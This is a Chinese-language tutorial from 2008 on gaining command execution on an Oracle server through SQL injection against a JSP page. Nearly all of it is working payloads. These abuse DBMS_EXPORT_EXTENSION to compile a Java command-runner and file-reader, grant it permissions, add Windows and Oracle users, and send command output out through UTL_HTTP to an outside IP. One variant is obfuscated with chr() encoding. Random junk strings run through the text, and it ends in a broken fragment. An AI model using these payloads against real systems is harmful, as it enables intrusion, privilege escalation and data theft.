
实例演示oracle注入获取cmdshell的全过程

以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成   G- `& c$ A- \
' ^1 [* R9 C1 ]  S# K& U
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
/ ~4 }1 w8 [/ @* a6 f% S的形式即可。(用" 'a'|| "是为了让语句返回true值)
  k9 f" e# l4 d1 f# O; Z$ @语句有点长,可能要用post提交。
以下是各个步骤:
1.创建包
3 x" i* m8 Y) h" m) m8 H; ~( B通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:6 f3 o) T' T' d# d9 J
/xxx.jsp?id=1 and '1'<>'a'||( # c- S/ t3 t- s4 V  P! X" m4 C
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''2 l# e0 z4 O, ]( V0 i7 E
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(0 T5 D9 ]/ |: g) a6 N0 K
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
/ k$ I. d$ p" |: i5 L8 u}'''';END;'';END;--','SYS',0,'1',0) from dual
  z5 y; X9 a, @3 @) , D+ I3 ]) k* m6 T  @4 q
------------------------
# E( y/ T! ^% \, E/ C6 j如果url有长度限制,可以把readFile()函数块去掉,即: 6 H. u! t: y& F6 F3 d
/xxx.jsp?id=1 and '1'<>'a'||(
* |; L3 R. o5 `/ w3 M) Sselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
" h7 ?, ]+ y3 Q( Y* A/ a* [8 ucreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(: L  A. c0 ]5 ^0 q4 G7 {2 C$ C& D
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}4 t( t! W0 N, n: B
}'''';END;'';END;--','SYS',0,'1',0) from dual
% w  L1 u$ k' ^! X- v0 ]7 E+ W/ A) 6 Y# f, T6 _2 a5 Y' A) Y& Y
同时把后面步骤 提到的 对readFile()的处理语句去掉。 : J  n7 [- c1 i7 Z5 l
------------------------------
2.赋Java权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual; e7 J+ A+ F' s* n& _6 h
3.创建函数
/ ]2 Z$ D. i! r) X$ l7 r7 x1 @select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
8 a6 o/ n$ g" u- X  r* s2 ?0 j, u. ?create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
# J: `5 t. ], t$ h  Fselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''! a5 J, P. T8 r& e" ^
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
4.赋public执行函数的权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
2 |* @9 Z0 y$ W$ W% I9 J3 m2 yselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
5.测试上面的几步是否成功
and '1'<>'11'||(
5 u! l# q7 {9 P( L5 [- Kselect  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
+ i5 t; R2 u& T7 M8 n)
, p4 |$ T' T5 ]/ j  {- [* aand '1'<>(
; C/ I' T" P5 n  m7 @! V; \3 W( J2 [) k! zselect  OBJECT_ID from all_objects where  object_name ='LINXREADFILE' 9 ]1 t8 r. C9 G5 d% n' ~3 U3 h# Z
)
6.执行命令:
5 W( S5 n4 F% d$ w- A+ R/xxx.jsp?id=1 and '1'<>(
+ D" Q  h# {9 Jselect  sys.LinxRunCMD('cmd /c net user linx /add') from dual
% ]9 m& Q' k1 u" R" X! q+ l5 m: \( r( |' r& j
) ; b8 d+ w) f2 E* k
/xxx.jsp?id=1 and '1'<>( / |- f. S& }9 c" [1 N; D
select  sys.LinxReadFile('c:/boot.ini') from dual
, d8 Y) k4 J. I. {' X+ H3 a# Z* S
1 q# s5 |: C3 Q' R+ F)
2 J7 k; \' r8 G5 {7 Q  
, ?& H! [+ L- p9 o/ n+ e( L注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 ; `6 g: K# l4 M% ]( j* Z
如果要查看运行结果可以用 union : 3 _& V6 u" k# Y) e2 y4 |
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
/ r) u& A2 {: U. k: w: z6 l! E或者UTL_HTTP.request(:
/ I# K4 h- n1 U' j/ H/xxx.jsp?id=1 and '1'<>(
/ _, U; g' k0 J8 {SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
6 M% ~( `5 b6 E; C# J0 Q)
5 l# y2 N; n4 N) k1 W4 r6 j/xxx.jsp?id=1 and '1'<>(
/ w, l* [2 @' I4 ~4 a5 ESELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
' V* {' [7 ~+ t5 a5 Z7 d/ H. m6 ^) W)
* e: {5 e  p' d- u9 y3 x6 y" V6 g注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。8 M! P( O+ ?9 [% e' p
--------------------
6.内部变化
, Q0 X# f) I3 ~4 u% n3 T通过以下命令可以查看all_objects表达改变:
% f2 A5 J% u% p" z7 _& K+ k* J) g0 `select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
7.删除我们创建的函数
. K( ^% |( D! n) r7 ^$ Hselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''') x6 A9 ~. C. }* ^. F7 W3 b
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual ) `; h; ^8 a1 c& {. V! {" D
====================================================
全文结束。谨以此文赠与我的朋友。
4 G/ Y  J+ Q' Y/ a+ X1 mlinx . ^: }% C$ u4 v* ~# J5 U6 b
124829445   E+ W* e# e* h" C5 d8 k& p
2008.1.12
7 _4 ?9 @7 d3 q& e+ @linyujian@bjfu.edu.cn , r3 t8 f+ w, G, ~. t0 w' V5 p! g2 L
======================================================================
测试漏洞的另一方法:
创建oracle帐号:
+ g$ Q# s3 @7 [8 _& U6 `0 \select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''+ T' e  b/ x- `, N$ D+ C* w
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual* E2 P; a( D% O0 [; m' V( U5 J/ `
即:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
) q5 G6 Z; L8 Uchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
确定漏洞存在:
1<>( 8 S0 Z2 n# N3 e9 J' ^
select user_id from all_users where username='LINXSQL'
; ]. ]2 V3 n' p: g( b. Q)
给linxsql连接权限:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
7 w8 ^4 h0 T, W# XGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
删除帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''" S2 z* F5 I. |. F; m, G
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
2 T' y) r, m$ S  A====================== ) y# B* V3 f9 l2 S5 q1 n2 ]. g
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:. U- ~! |& U2 Q+ m( U8 A% d
1.jsp?id=1 and '1'<>( $ n8 \$ ?) e0 X/ S2 W
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''! a5 b4 ~2 O, `" b1 C- y3 J
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
) g- w. U# \& H# g$ C7 [) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE8 \, f+ m2 c: G+ o* M0 W
 )9 p' W9 D* Q( q. f
4 @" {' c; j# e8 Z
1 o$ v; b' ?& T( Q' P  q
" ?, M8 q9 x: Q2 e